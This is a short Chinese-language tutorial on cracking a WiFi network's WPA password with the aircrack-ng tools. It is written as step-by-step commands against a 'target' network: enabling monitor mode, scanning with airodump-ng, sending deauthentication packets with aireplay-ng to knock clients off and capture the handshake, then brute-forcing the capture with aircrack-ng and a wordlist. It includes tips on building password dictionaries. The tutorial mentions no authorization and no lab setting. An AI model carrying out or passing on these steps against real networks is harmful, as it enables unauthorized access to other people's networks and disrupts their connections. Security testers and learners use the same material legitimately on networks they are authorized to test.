需要一个支持监听模式的网卡
先查看一下usb网卡是否连接到虚拟机

airmon-ng 查看网卡是否在监听模式

显示wlan0说明不在监听模式

airmon-ng start wlan0  开启监听模式

ifconfig 显示wlan0mon表示以在监听模式

airodump-ng wlan0mon 搜索附近WiFi

搜索到目标WiFi CTRL+C暂停扫描
抓取握手包

airodump-ng -w 握手包文件名 -c 信道 --bssid 目标bssid地址 wlan0mon

BSSID WiFi设备的MAC地址
PWR 信号水平
Beacons 数据的速率

Date 捕获的数据分组数量

/S 十秒内的捕获数据分组量

CH 信道号
MB 数据传输速率
ENC 加密类型
CIPHER 加密算法
AUTH 认证协议
ESSID WIFI名称

新建终端窗口

aireplay-ng -0 反认证包个数（随意） -a （路由器mac地址（bssid）） -c 连接设备 mac wlan0mon

抓到握手包后抓取的设备后会显示WiFi名字
抓取到后握手包会储存到主目录

对握手包进行暴力破解

aircrack-ng -w /usr/share/sqlmap/txt/wordlist.txt 握手包文件名.cap

这种方法依靠字典的和计算机的运行速度，假如目标WIFI设备的密码复杂性强，或者跑了几G的字典，而该字典并没有该密码，这将是很浪费时间的事情。 关于字典，字典也并不是越大越好，大家可以利用工具生成或从网络上下载一份字典。或者根据自己收集的材料和推断自己做字典。